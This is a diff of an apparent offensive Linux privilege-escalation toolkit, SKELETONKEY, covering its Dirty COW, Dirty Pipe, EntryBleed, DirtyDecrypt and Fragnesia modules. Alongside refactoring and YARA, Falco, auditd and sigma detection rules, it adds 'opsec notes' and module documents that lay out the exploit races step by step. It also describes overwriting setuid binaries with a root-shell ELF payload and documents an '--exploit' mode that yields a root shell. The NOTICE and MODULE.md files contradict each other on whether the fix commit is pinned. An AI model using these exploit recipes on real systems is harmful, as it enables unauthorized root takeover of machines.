        fprintf(stderr, "[!] dirty_cow: kernel %s is in the vulnerable range\n",
-                v.release);
+                v->release);
        fprintf(stderr, "[i] dirty_cow: --exploit will race a write to "
                        "/etc/passwd via /proc/self/mem\n");
    }
@@ -258,7 +267,10 @@ static skeletonkey_result_t dirty_cow_exploit(const struct skeletonkey_ctx *ctx)
        return pre;
    }

-    if (geteuid() == 0) {
+    /* Consult ctx->host->is_root so unit tests can construct a
+     * non-root fingerprint regardless of the test process's real euid. */
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (is_root) {
        fprintf(stderr, "[i] dirty_cow: already root — nothing to escalate\n");
        return SKELETONKEY_OK;
    }
@@ -318,6 +330,34 @@ static skeletonkey_result_t dirty_cow_cleanup(const struct skeletonkey_ctx *ctx)
    return SKELETONKEY_OK;
 }

+#else  /* !__linux__ */
+
+/* Non-Linux dev builds: the Dirty COW primitive (writer thread via
+ * /proc/self/mem + madvise(MADV_DONTNEED)) is Linux-only kernel
+ * surface. Stub out cleanly so the module still registers and
+ * `--list` / `--detect-rules` work on macOS/BSD dev boxes — and so
+ * the top-level `make` actually completes there. */
+static skeletonkey_result_t dirty_cow_detect(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->json)
+        fprintf(stderr, "[i] dirty_cow: Linux-only module "
+                "(/proc/self/mem + madvise race) — not applicable here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t dirty_cow_exploit(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    fprintf(stderr, "[-] dirty_cow: Linux-only module — cannot run here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t dirty_cow_cleanup(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    return SKELETONKEY_OK;
+}
+
+#endif /* __linux__ */
+
 /* ---- Embedded detection rules ---- */

 static const char dirty_cow_auditd[] =
@@ -350,6 +390,35 @@ static const char dirty_cow_sigma[] =
    "level: high\n"
    "tags: [attack.privilege_escalation, attack.t1068, cve.2016.5195]\n";

+static const char dirty_cow_yara[] =
+    "rule dirty_cow_cve_2016_5195 : cve_2016_5195 page_cache_write\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2016-5195\"\n"
+    "        description = \"Dirty COW /etc/passwd UID-flip pattern (non-root user remapped to 0000+)\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $uid_flip = /\\n[a-z_][a-z0-9_-]{0,30}:[^:]{0,8}:0{4,}:[0-9]+:/\n"
+    "    condition:\n"
+    "        $uid_flip\n"
+    "}\n";
+
+static const char dirty_cow_falco[] =
+    "- rule: Dirty COW pwrite on /proc/self/mem by non-root\n"
+    "  desc: |\n"
+    "    Non-root pwrite() targeting /proc/self/mem at an offset that\n"
+    "    overlaps a private mmap of /etc/passwd. Combined with a\n"
+    "    racing madvise(MADV_DONTNEED) loop this is the Dirty COW\n"
+    "    primitive (CVE-2016-5195).\n"
+    "  condition: >\n"
+    "    evt.type = pwrite and fd.name = /proc/self/mem and\n"
+    "    not user.uid = 0\n"
+    "  output: >\n"
+    "    pwrite to /proc/self/mem by non-root\n"
+    "    (user=%user.name proc=%proc.name pid=%proc.pid)\n"
+    "  priority: CRITICAL\n"
+    "  tags: [filesystem, mitre_privilege_escalation, T1068, cve.2016.5195]\n";
+
 const struct skeletonkey_module dirty_cow_module = {
    .name           = "dirty_cow",
    .cve            = "CVE-2016-5195",
@@ -362,8 +431,9 @@ const struct skeletonkey_module dirty_cow_module = {
    .cleanup        = dirty_cow_cleanup,
    .detect_auditd  = dirty_cow_auditd,
    .detect_sigma   = dirty_cow_sigma,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_yara    = dirty_cow_yara,
+    .detect_falco   = dirty_cow_falco,
+    .opsec_notes    = "Two-thread race: Thread A loops pwrite(/proc/self/mem) at the user's UID offset in /etc/passwd; Thread B loops madvise(MADV_DONTNEED) on a PRIVATE mmap of /etc/passwd. Overwrites the UID field with all-zeros, then execlp('su') to claim root. UID offset is parsed from the file, not hardcoded. Audit-visible via open(/proc/self/mem) + write + madvise(MADV_DONTNEED) bursts + /etc/passwd page-cache poisoning. Cleanup callback calls posix_fadvise(POSIX_FADV_DONTNEED) on /etc/passwd and writes 3 to /proc/sys/vm/drop_caches to evict.",
 };

 void skeletonkey_register_dirty_cow(void)
@@ -32,7 +32,6 @@

 #include "skeletonkey_modules.h"
 #include "../../core/registry.h"
-#include "../../core/kernel_range.h"

 /* _GNU_SOURCE is passed via -D in the top-level Makefile; do not
 * redefine here (warning: redefined). */
@@ -42,6 +41,11 @@
 #include <string.h>
 #include <stdbool.h>
 #include <unistd.h>
+
+#ifdef __linux__
+
+#include "../../core/kernel_range.h"   /* used inside this block only */
+#include "../../core/host.h"
 #include <fcntl.h>
 #include <errno.h>
 #include <sys/stat.h>
@@ -254,22 +258,27 @@ static int dirty_pipe_active_probe(void)

 static skeletonkey_result_t dirty_pipe_detect(const struct skeletonkey_ctx *ctx)
 {
-    struct kernel_version v;
-    if (!kernel_version_current(&v)) {
-        fprintf(stderr, "[!] dirty_pipe: could not parse kernel version\n");
+    /* Consult the shared host fingerprint instead of calling
+     * kernel_version_current() ourselves — populated once at startup
+     * and identical across every module's detect(). */
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json)
+            fprintf(stderr, "[!] dirty_pipe: host fingerprint missing kernel "
+                "version — bailing\n");
        return SKELETONKEY_TEST_ERROR;
    }

    /* Bug introduced in 5.8. */
-    if (v.major < 5 || (v.major == 5 && v.minor < 8)) {
+    if (!skeletonkey_host_kernel_at_least(ctx->host, 5, 8, 0)) {
        if (!ctx->json) {
            fprintf(stderr, "[i] dirty_pipe: kernel %s predates the bug (introduced in 5.8)\n",
-                    v.release);
+                    v->release);
        }
        return SKELETONKEY_OK;
    }

-    bool patched_by_version = kernel_range_is_patched(&dirty_pipe_range, &v);
+    bool patched_by_version = kernel_range_is_patched(&dirty_pipe_range, v);

    /* Active probe overrides version-only verdict when requested.
     * The version check is necessary-but-not-sufficient: distros
@@ -284,7 +293,7 @@ static skeletonkey_result_t dirty_pipe_detect(const struct skeletonkey_ctx *ctx)
        if (probe == 1) {
            if (!ctx->json) {
                fprintf(stderr, "[!] dirty_pipe: ACTIVE PROBE CONFIRMED — primitive lands "
-                                "(version %s)\n", v.release);
+                                "(version %s)\n", v->release);
            }
            return SKELETONKEY_VULNERABLE;
        }
@@ -307,14 +316,14 @@ static skeletonkey_result_t dirty_pipe_detect(const struct skeletonkey_ctx *ctx)
    if (patched_by_version) {
        if (!ctx->json) {
            fprintf(stderr, "[+] dirty_pipe: kernel %s is patched (version-only check; "
-                            "use --active to confirm empirically)\n", v.release);
+                            "use --active to confirm empirically)\n", v->release);
        }
        return SKELETONKEY_OK;
    }
    if (!ctx->json) {
        fprintf(stderr, "[!] dirty_pipe: kernel %s appears VULNERABLE (version-only check)\n"
                        "    Confirm empirically: re-run with --scan --active\n",
-                v.release);
+                v->release);
    }
    return SKELETONKEY_VULNERABLE;
 }
@@ -328,17 +337,20 @@ static skeletonkey_result_t dirty_pipe_exploit(const struct skeletonkey_ctx *ctx
        return pre;
    }

-    /* Resolve current user. */
+    /* Resolve current user. Consult ctx->host->is_root for the
+     * already-root short-circuit so unit tests can construct a
+     * non-root fingerprint regardless of the test process's real euid. */
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (is_root) {
+        fprintf(stderr, "[i] dirty_pipe: already running as root — nothing to escalate\n");
+        return SKELETONKEY_OK;
+    }
    uid_t euid = geteuid();
    struct passwd *pw = getpwuid(euid);
    if (!pw) {
        fprintf(stderr, "[-] dirty_pipe: getpwuid(%d) failed: %s\n", euid, strerror(errno));
        return SKELETONKEY_TEST_ERROR;
    }
-    if (euid == 0) {
-        fprintf(stderr, "[i] dirty_pipe: already running as root — nothing to escalate\n");
-        return SKELETONKEY_OK;
-    }

    /* Find the UID field. Need a 4-digit-or-similar UID we can replace
     * with "0000" of identical width. Refuse if the user's UID width
@@ -407,6 +419,34 @@ static skeletonkey_result_t dirty_pipe_cleanup(const struct skeletonkey_ctx *ctx
    return SKELETONKEY_OK;
 }

+#else  /* !__linux__ */
+
+/* Non-Linux dev builds: splice() / F_GETPIPE_SZ / posix_fadvise() are
+ * Linux-only kernel surface; the Dirty Pipe primitive is structurally
+ * unreachable elsewhere. Stub out cleanly so the module still
+ * registers and `--list` / `--detect-rules` work on macOS/BSD dev
+ * boxes — and so the top-level `make` actually completes there. */
+static skeletonkey_result_t dirty_pipe_detect(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->json)
+        fprintf(stderr, "[i] dirty_pipe: Linux-only module "
+                "(splice + PIPE_BUF_FLAG_CAN_MERGE) — not applicable here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t dirty_pipe_exploit(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    fprintf(stderr, "[-] dirty_pipe: Linux-only module — cannot run here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t dirty_pipe_cleanup(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    return SKELETONKEY_OK;
+}
+
+#endif /* __linux__ */
+
 /* Embedded detection rules — keep the binary self-contained so
 * `skeletonkey --detect-rules --format=auditd` works without a separate
 * data-dir install. */
@@ -420,6 +460,39 @@ static const char dirty_pipe_auditd[] =
    "-a always,exit -F arch=b64 -S splice -k skeletonkey-dirty-pipe-splice\n"
    "-a always,exit -F arch=b32 -S splice -k skeletonkey-dirty-pipe-splice\n";

+static const char dirty_pipe_yara[] =
+    "rule dirty_pipe_passwd_uid_flip : cve_2022_0847 page_cache_write\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2022-0847\"\n"
+    "        description = \"Dirty Pipe (CVE-2022-0847): /etc/passwd page-cache UID flip — non-root username remapped to UID 0000+. Scan /etc/passwd directly; legitimate root entries use '0:', never '0000:'.\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $uid_flip = /\\n[a-z_][a-z0-9_-]{0,30}:[^:]{0,8}:0{4,}:[0-9]+:/\n"
+    "    condition:\n"
+    "        $uid_flip\n"
+    "}\n";
+
+static const char dirty_pipe_falco[] =
+    "- rule: Dirty Pipe splice from setuid/sensitive file by non-root\n"
+    "  desc: |\n"
+    "    A non-root process calls splice() with a fd pointing at a\n"
+    "    setuid-root binary or a credential file. The Dirty Pipe\n"
+    "    primitive (CVE-2022-0847) splices 1 byte from the target to\n"
+    "    a prepared pipe to inherit the stale PIPE_BUF_FLAG_CAN_MERGE,\n"
+    "    then writes attacker bytes that land in the file's page cache.\n"
+    "  condition: >\n"
+    "    evt.type = splice and not user.uid = 0 and\n"
+    "    (fd.name in (/etc/passwd, /etc/shadow, /etc/sudoers)\n"
+    "     or fd.name startswith /usr/bin/su\n"
+    "     or fd.name startswith /usr/bin/passwd\n"
+    "     or fd.name startswith /bin/su)\n"
+    "  output: >\n"
+    "    Dirty Pipe-style splice from sensitive file by non-root\n"
+    "    (user=%user.name proc=%proc.name fd=%fd.name pid=%proc.pid)\n"
+    "  priority: CRITICAL\n"
+    "  tags: [filesystem, mitre_privilege_escalation, T1068, cve.2022.0847]\n";
+
 static const char dirty_pipe_sigma[] =
    "title: Possible Dirty Pipe exploitation (CVE-2022-0847)\n"
    "id: f6b13c08-skeletonkey-dirty-pipe\n"
@@ -447,8 +520,9 @@ const struct skeletonkey_module dirty_pipe_module = {
    .cleanup        = dirty_pipe_cleanup,
    .detect_auditd  = dirty_pipe_auditd,
    .detect_sigma   = dirty_pipe_sigma,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_yara    = dirty_pipe_yara,
+    .detect_falco   = dirty_pipe_falco,
+    .opsec_notes    = "Creates a pipe, fills+drains to leave PIPE_BUF_FLAG_CAN_MERGE on every slot; finds the UID offset in /etc/passwd by parsing the file; splice(1 byte) from (target_offset-1) to inherit the stale flag, then write(pipe) with the all-zero payload - kernel merges into the file's page cache. Offset must be non-page-aligned and the write must fit in a single page. Audit-visible via splice(fd=/etc/passwd) + write from a non-root process. --active mode writes/reads /tmp/skeletonkey-dirty-pipe-probe-XXXXXX to verify. Cleanup callback evicts /etc/passwd via posix_fadvise + drop_caches.",
 };

 void skeletonkey_register_dirty_pipe(void)
@@ -0,0 +1,81 @@
+# dirtydecrypt — CVE-2026-31635
+
+> 🟡 **PRIMITIVE / ported.** Faithful port of the public V12 PoC into
+> the `skeletonkey_module` interface. **Not yet validated end-to-end on
+> a vulnerable-kernel VM** — see _Verification status_ below.
+
+## Summary
+
+DirtyDecrypt (a.k.a. DirtyCBC) is a missing copy-on-write guard in
+`rxgk_decrypt_skb()` (`net/rxrpc/rxgk_common.h`). The function decrypts
+incoming rxgk socket buffers **in place** before the HMAC is verified.
+When the skb fragment pages are page-cache pages — spliced in via
+`MSG_SPLICE_PAGES` over loopback — the in-place AES decrypt corrupts the
+page cache of a read-only file.
+
+It is a sibling of Copy Fail (CVE-2026-31431) and Dirty Frag
+(CVE-2026-43284 / 43500): same bug class, different kernel subsystem
+(rxgk / AFS-style rxrpc encryption rather than algif_aead or xfrm-ESP).
+
+## Primitive
+
+Each `fire()`:
+
+1. Adds an `rxrpc` security key holding a crafted rxgk XDR token.
+2. Opens an `AF_RXRPC` client + a fake UDP server on loopback and
+   completes the rxgk handshake.
+3. Forges a DATA packet whose **wire header comes from userspace** and
+   whose **payload pages come from the target file's page cache**
+   (`splice` + `vmsplice`).
+4. The kernel decrypts the spliced page-cache pages in place — the HMAC
+   check then fails (expected), but the page cache is already mutated.
+
+`pagecache_write()` drives a **sliding-window** technique: byte[0] of
+each corrupted 16-byte AES block is uniformly random (≈1/256 chance of
+the wanted value), and round _i+1_ at offset _S+i+1_ overwrites the
+15-byte collateral of round _i_ without disturbing the byte round _i_
+fixed. Net cost ≈ 256 fires per byte.
+
+The exploit rewrites the first 120 bytes of a setuid-root binary
+(`/usr/bin/su` and friends) with a tiny ET_DYN ELF that calls
+`setuid(0)` + `execve("/bin/sh")`.
+
+## Operations
+
+| Op | Behaviour |
+|---|---|
+| `--scan` | Checks AF_RXRPC reachability + a readable setuid carrier. With `--active`, fires the primitive against a disposable `/tmp` file and reports VULNERABLE/OK empirically. |
+| `--exploit … --i-know` | Forks a child that corrupts the carrier's page cache and execs it for a root shell. `--no-shell` stops after the page-cache write. |
+| `--cleanup` | Evicts the carrier from the page cache (`POSIX_FADV_DONTNEED` + `drop_caches`). The on-disk binary is never written. |
+| `--detect-rules` | Emits embedded auditd + sigma rules. |
+
+## Preconditions
+
+- `AF_RXRPC` reachable (the `rxrpc` module loadable / built in).
+- A readable setuid-root binary to use as the payload carrier.
+- x86_64 (the embedded ELF payload is x86_64 shellcode).
+
+## Verification status
+
+This module is a **faithful port** of
+<https://github.com/v12-security/pocs/tree/main/dirtydecrypt>, compiled
+into the SKELETONKEY module interface. The **exploit body** has not
+been validated end-to-end against a known-vulnerable kernel inside the
+SKELETONKEY CI matrix.
+
+**`detect()` is now version-pinned** against the mainline fix commit
+[`a2567217ade970ecc458144b6be469bc015b23e5`][fix] (Linux 7.0): kernels
+< 7.0 predate the vulnerable rxgk RESPONSE-handling code (Debian
+tracker confirms older stable branches as <not-affected, vulnerable
+code not present>), kernels ≥ 7.0 have the fix. With `--active`, the
+detector runs the rxgk primitive against a `/tmp` sentinel and reports
+empirically — catches pre-fix 7.0-rc kernels and any distro rebuilds
+the version check misses.
+
+[fix]: https://git.kernel.org/linus/a2567217ade970ecc458144b6be469bc015b23e5
+
+**Before promoting to 🟢:** validate the exploit end-to-end on a 7.0-rc
+kernel that pre-dates commit `a2567217ade…`. The Debian tracker entry
+for CVE-2026-31635 is the source of truth for branch-backport
+thresholds; extend the `kernel_range` table when distros publish
+stable backports.
@@ -0,0 +1,47 @@
+# NOTICE — dirtydecrypt
+
+## Vulnerability
+
+**CVE-2026-31635** — "DirtyDecrypt" / "DirtyCBC". Missing copy-on-write
+guard in `rxgk_decrypt_skb()` (`net/rxrpc/rxgk_common.h`). The function
+calls `skb_to_sgvec()` then `crypto_krb5_decrypt()` with no
+`skb_cow_data()`; the `krb5enc` AEAD template (`crypto/krb5enc.c`)
+decrypts **in place** before verifying the HMAC. When the skb fragment
+pages are page-cache pages (spliced in via `MSG_SPLICE_PAGES` over
+loopback), the in-place decrypt corrupts the page cache of a read-only
+file. The same pattern exists in rxkad (`rxkad_verify_packet_2`).
+
+Sibling of Copy Fail (CVE-2026-31431) and Dirty Frag
+(CVE-2026-43284 / CVE-2026-43500) — all are page-cache write
+primitives that abuse a missing COW boundary.
+
+## Research credit
+
+Discovered and reported by **Zellic** and the **V12 security** team.
+Public proof-of-concept by **Luna Tong** ("cts" / "gf_256") of the
+V12 security team.
+
+> Reference PoC: <https://github.com/v12-security/pocs/tree/main/dirtydecrypt>
+
+The upstream PoC file (`poc.c`) carries no author, project, or
+`LICENSE` header of its own — its header is a purely technical
+description of the bug. The credit above is from the public
+disclosure, not from the file. CVE-2026-31635 was assigned for the
+flaw; its fix commit is not pinned in this module (see below).
+
+## SKELETONKEY role
+
+`skeletonkey_modules.c` is a port of the V12 PoC into the
+`skeletonkey_module` interface. The exploit primitive — the
+`fire()` / `pagecache_write()` sliding-window machinery, the rxgk XDR
+token builder, the 120-byte ET_DYN ELF payload — is reproduced from
+that PoC. SKELETONKEY adds the detect/cleanup lifecycle, an `--active`
+sentinel probe, `--no-shell` support, and the embedded detection
+rules. Research credit belongs to the people above.
+
+## Verification status
+
+**Ported, not yet validated end-to-end on a vulnerable-kernel VM.**
+The CVE-2026-31635 fix commit is not yet pinned in this module, so
+`detect()` does not perform a kernel-version patched/vulnerable
+verdict — see `MODULE.md`.
@@ -0,0 +1,28 @@
+# DirtyDecrypt (CVE-2026-31635) — auditd detection rules
+#
+# The rxgk in-place decrypt corrupts the page cache of a read-only
+# file. These rules flag the syscall surface the exploit drives and
+# writes to the setuid binaries it targets.
+#
+# Install: copy into /etc/audit/rules.d/ and `augenrules --load`, or
+#   skeletonkey --detect-rules --format=auditd | sudo tee \
+#     /etc/audit/rules.d/99-skeletonkey.rules
+
+# Modification of common payload carriers / credential files
+-w /usr/bin/su     -p wa -k skeletonkey-dirtydecrypt
+-w /bin/su         -p wa -k skeletonkey-dirtydecrypt
+-w /usr/bin/mount  -p wa -k skeletonkey-dirtydecrypt
+-w /usr/bin/passwd -p wa -k skeletonkey-dirtydecrypt
+-w /usr/bin/chsh   -p wa -k skeletonkey-dirtydecrypt
+-w /etc/passwd     -p wa -k skeletonkey-dirtydecrypt
+-w /etc/shadow     -p wa -k skeletonkey-dirtydecrypt
+
+# AF_RXRPC socket creation (family 33) — core of the rxgk trigger
+-a always,exit -F arch=b64 -S socket -F a0=33 -k skeletonkey-dirtydecrypt-rxrpc
+
+# rxrpc security keys added to the process keyring
+-a always,exit -F arch=b64 -S add_key -k skeletonkey-dirtydecrypt-key
+
+# splice() drives page-cache pages into the forged DATA packet
+-a always,exit -F arch=b64 -S splice -k skeletonkey-dirtydecrypt-splice
+-a always,exit -F arch=b32 -S splice -k skeletonkey-dirtydecrypt-splice
@@ -0,0 +1,32 @@
+title: Possible DirtyDecrypt exploitation (CVE-2026-31635)
+id: 7c1e9a40-skeletonkey-dirtydecrypt
+status: experimental
+description: |
+  Detects the file-modification footprint of the rxgk page-cache write
+  (DirtyDecrypt / DirtyCBC, CVE-2026-31635): non-root creation of
+  AF_RXRPC sockets followed by modification of a setuid-root binary or
+  a credential file.
+references:
+  - https://github.com/v12-security/pocs/tree/main/dirtydecrypt
+logsource:
+  product: linux
+  service: auditd
+detection:
+  modification:
+    type: 'PATH'
+    name|startswith:
+      - '/usr/bin/su'
+      - '/bin/su'
+      - '/usr/bin/mount'
+      - '/usr/bin/passwd'
+      - '/usr/bin/chsh'
+      - '/etc/passwd'
+      - '/etc/shadow'
+  not_root:
+    auid|expression: '!= 0'
+  condition: modification and not_root
+level: high
+tags:
+  - attack.privilege_escalation
+  - attack.t1068
+  - cve.2026.31635
@@ -0,0 +1,12 @@
+/*
+ * dirtydecrypt_cve_2026_31635 — SKELETONKEY module registry hook
+ */
+
+#ifndef DIRTYDECRYPT_SKELETONKEY_MODULES_H
+#define DIRTYDECRYPT_SKELETONKEY_MODULES_H
+
+#include "../../core/module.h"
+
+extern const struct skeletonkey_module dirtydecrypt_module;
+
+#endif
@@ -32,6 +32,7 @@

 #include "skeletonkey_modules.h"
 #include "../../core/registry.h"
+#include "../../core/host.h"

 #include <stdio.h>
 #include <stdint.h>
@@ -108,40 +109,33 @@ unsigned long entrybleed_leak_kbase_lib(unsigned long entry_syscall_slot_offset)
    return (unsigned long)best_base;
 }

-static int read_first_line(const char *path, char *out, size_t n)
-{
-    FILE *f = fopen(path, "r");
-    if (!f) return -1;
-    if (!fgets(out, n, f)) { fclose(f); return -1; }
-    fclose(f);
-    /* trim trailing newline */
-    size_t L = strlen(out);
-    while (L && (out[L-1] == '\n' || out[L-1] == '\r')) out[--L] = 0;
-    return 0;
-}
+/* (read_first_line() removed — meltdown status now comes from
+ * ctx->host->meltdown_mitigation, populated once at startup in
+ * core/host.c. One file open across the corpus instead of per-detect.) */

 static skeletonkey_result_t entrybleed_detect(const struct skeletonkey_ctx *ctx)
 {
-    /* Probe KPTI status. /sys/devices/system/cpu/vulnerabilities/meltdown
-     * is the most direct signal: "Mitigation: PTI" means KPTI is on
-     * (= EntryBleed-applicable). "Not affected" means a hardened CPU
-     * (very recent Intel + most AMD = no KPTI = no EntryBleed). */
-    char buf[256];
-    int rc = read_first_line(
-        "/sys/devices/system/cpu/vulnerabilities/meltdown", buf, sizeof buf);
-    if (rc < 0) {
+    /* KPTI status comes from the shared host fingerprint
+     * (ctx->host->meltdown_mitigation) — populated once at startup by
+     * reading /sys/devices/system/cpu/vulnerabilities/meltdown. The
+     * raw string is preserved (not just the kpti_enabled bool) so we
+     * can distinguish "Not affected" (CPU immune; OK) from
+     * "Mitigation: PTI" / "Vulnerable" (KPTI on; vulnerable to
+     * EntryBleed) without re-reading sysfs. */
+    const char *meltdown = ctx->host ? ctx->host->meltdown_mitigation : "";
+    if (meltdown[0] == '\0') {
        if (!ctx->json) {
-            fprintf(stderr, "[?] entrybleed: cannot read meltdown vuln status — "
+            fprintf(stderr, "[?] entrybleed: meltdown vuln status unknown — "
                            "assuming KPTI on (conservative)\n");
        }
        return SKELETONKEY_VULNERABLE;
    }
    if (!ctx->json) {
-        fprintf(stderr, "[i] entrybleed: meltdown status = '%s'\n", buf);
+        fprintf(stderr, "[i] entrybleed: meltdown status = '%s'\n", meltdown);
    }

    /* "Not affected" → CPU is Meltdown-immune → no KPTI → no EntryBleed */
-    if (strstr(buf, "Not affected") != NULL) {
+    if (strstr(meltdown, "Not affected") != NULL) {
        if (!ctx->json) {
            fprintf(stderr, "[+] entrybleed: CPU is Meltdown-immune; KPTI off; "
                            "EntryBleed N/A\n");
@@ -294,6 +288,7 @@ const struct skeletonkey_module entrybleed_module = {
    .detect_sigma   = entrybleed_sigma,
    .detect_yara    = NULL,
    .detect_falco   = NULL,
+    .opsec_notes    = "Pure timing side-channel: rdtsc + prefetchnta sweep across the kernel high-half (~16 MiB) to time which 2 MiB page is mapped (entry_SYSCALL_64) and subtract its known offset from kbase. No syscalls fired, no file artifacts, no network. Classic auditd cannot see it; perf-counter EDR can flag a process spending unusual time in tight prefetchnta loops but classic rules will not. No cleanup needed.",
 };

 void skeletonkey_register_entrybleed(void)
@@ -0,0 +1,87 @@
+# fragnesia — CVE-2026-46300
+
+> 🟡 **PRIMITIVE / ported.** Faithful port of the public V12 PoC into
+> the `skeletonkey_module` interface. **Not yet validated end-to-end on
+> a vulnerable-kernel VM** — see _Verification status_ below.
+
+## Summary
+
+Fragnesia ("Fragment Amnesia") is an XFRM ESP-in-TCP local privilege
+escalation. `skb_try_coalesce()` fails to propagate the
+`SKBFL_SHARED_FRAG` marker when moving paged fragments between socket
+buffers — so the kernel forgets that a fragment is externally backed by
+page-cache pages spliced in from a file. The ESP-in-TCP receive path
+then decrypts in place, corrupting the page cache of a read-only file.
+
+Fragnesia is a **latent bug exposed by the Dirty Frag fix**: the
+candidate patch cites the Dirty Frag remediation (`f4c50a4034e6`) as a
+commit it "fixes". It is the same page-cache-write bug class as Copy
+Fail / Dirty Frag, reached through a different code path.
+
+## Primitive
+
+1. Build a 256-entry **AES-GCM keystream-byte table** via `AF_ALG`
+   `ecb(aes)` — for any wanted output byte, this yields the ESP IV
+   whose keystream byte XORs the current byte to the target.
+2. Enter a mapped **user namespace** + **network namespace**, bring
+   loopback up, and install an XFRM **ESP-in-TCP** state
+   (`rfc4106(gcm(aes))`, `TCP_ENCAP_ESPINTCP`).
+3. A **receiver** accepts a loopback TCP connection and flips it to the
+   `espintcp` ULP; a **sender** `splice()`s page-cache pages of the
+   target file into that TCP stream behind a crafted ESP prefix.
+4. The coalesce bug makes the kernel decrypt the spliced page-cache
+   pages in place — one chosen byte per trigger.
+
+The exploit rewrites the first 192 bytes of a setuid-root binary
+(`/usr/bin/su` and friends) with an ET_DYN ELF that drops privileges to
+0 and `execve`s `/bin/sh`.
+
+## Operations
+
+| Op | Behaviour |
+|---|---|
+| `--scan` | Checks unprivileged-userns availability + a readable setuid carrier ≥ 4096 bytes. With `--active`, runs the full ESP-in-TCP primitive against a disposable `/tmp` file and reports VULNERABLE/OK empirically. |
+| `--exploit … --i-know` | Forks a child that places the payload into the carrier's page cache and execs it for a root shell. `--no-shell` stops after the page-cache write. |
+| `--cleanup` | Evicts the carrier from the page cache. The on-disk binary is never written. |
+| `--detect-rules` | Emits embedded auditd + sigma rules. |
+
+## Preconditions
+
+- **Unprivileged user namespaces enabled.** On Ubuntu, AppArmor blocks
+  this by default — `sysctl kernel.apparmor_restrict_unprivileged_userns=0`
+  (or chain a separate bypass). This is the scoping question the old
+  `_stubs/fragnesia_TBD` raised; the module ships and reports
+  `PRECOND_FAIL` cleanly when the userns gate is closed.
+- `CONFIG_INET_ESPINTCP` built into the kernel.
+- A readable setuid-root binary ≥ 4096 bytes as the payload carrier.
+- x86_64 (the embedded ELF payload is x86_64 shellcode).
+
+## Port notes
+
+The upstream PoC renders a full-screen ANSI "smash frame" TUI
+(`draw_smash_frame` + terminal scroll-region escapes). That is **not**
+ported — it cannot coexist with a shared multi-module dispatcher.
+Progress is logged with `[*]`/`[+]`/`[-]` prefixes, gated on `--json`.
+The exploit mechanism itself is reproduced faithfully.
+
+## Verification status
+
+This module is a **faithful port** of
+<https://github.com/v12-security/pocs/tree/main/fragnesia>, compiled
+into the SKELETONKEY module interface. The **exploit body** has not
+been validated end-to-end against a known-vulnerable kernel inside the
+SKELETONKEY CI matrix.
+
+**`detect()` is now version-pinned**: the Fragnesia fix ships in
+mainline Linux **7.0.9** (Debian tracker source-of-truth, `linux
+unstable: 7.0.9-1 fixed`). The `kernel_range` table marks the 7.0.x
+branch patched at `7.0.9`; older Debian-stable branches (5.10 / 6.1 /
+6.12) are currently still vulnerable per the tracker. With `--active`,
+the detector runs the full ESP-in-TCP primitive against a `/tmp` file
+and reports empirically — catches stable-branch backports the version
+table doesn't know about, and CONFIG_INET_ESPINTCP=n kernels where the
+primitive is structurally unreachable.
+
+**Before promoting to 🟢:** validate the exploit end-to-end on a
+≤ 7.0.8 kernel. Extend the `kernel_range` table with backport
+thresholds for 5.10 / 6.1 / 6.12 as distros publish them.
@@ -0,0 +1,48 @@
+# NOTICE — fragnesia
+
+## Vulnerability
+
+**CVE-2026-46300** — "Fragnesia" ("Fragment Amnesia"). XFRM ESP-in-TCP
+local privilege escalation. `skb_try_coalesce()` fails to propagate the
+`SKBFL_SHARED_FRAG` marker when moving paged fragments between socket
+buffers, so the kernel loses track of the fact that a fragment is
+externally backed by page-cache pages spliced in from a file. The
+ESP-in-TCP receive path then decrypts in place, corrupting the page
+cache of a read-only file.
+
+Fragnesia is a **latent bug exposed by the Dirty Frag remediation**:
+the candidate fix explicitly cites the Dirty Frag patch
+(`f4c50a4034e6`) as a commit it "fixes" — the Dirty Frag remediation
+made a previously latent flaw practically exploitable.
+
+## Research credit
+
+Discovered by **William Bowling** with the **V12 security** team.
+
+> Reference PoC: <https://github.com/v12-security/pocs/tree/main/fragnesia>
+> Patch thread: <https://lists.openwall.net/netdev/2026/05/13/79>
+
+## SKELETONKEY role
+
+`skeletonkey_modules.c` is a port of the V12 PoC
+(`xfrm_espintcp_pagecache_replace`) into the `skeletonkey_module`
+interface. The exploit primitive — the AES-GCM keystream-byte table
+built via AF_ALG, the per-byte IV selection, the userns + netns + XFRM
+ESP-in-TCP setup, the splice-driven sender/receiver trigger pair, the
+192-byte ELF payload — is reproduced from that PoC.
+
+**Port adaptation:** the PoC's ANSI "smash frame" TUI
+(`draw_smash_frame` + terminal scroll-region escape sequences) is
+**not** carried over — it is incompatible with running as one module
+among many under a shared dispatcher. Progress is reported with
+SKELETONKEY's `[*]`/`[+]`/`[-]` log prefixes instead. SKELETONKEY also
+adds the detect/cleanup lifecycle, an `--active` probe, `--no-shell`
+support, and the embedded detection rules. Research credit belongs to
+the people above.
+
+## Verification status
+
+**Ported, not yet validated end-to-end on a vulnerable-kernel VM.**
+Requires `CONFIG_INET_ESPINTCP` and unprivileged user-namespace
+creation. The CVE-2026-46300 fix commit is not yet pinned in this
+module — see `MODULE.md`.
@@ -0,0 +1,31 @@
+# Fragnesia (CVE-2026-46300) — auditd detection rules
+#
+# The XFRM ESP-in-TCP coalesce bug corrupts the page cache of a
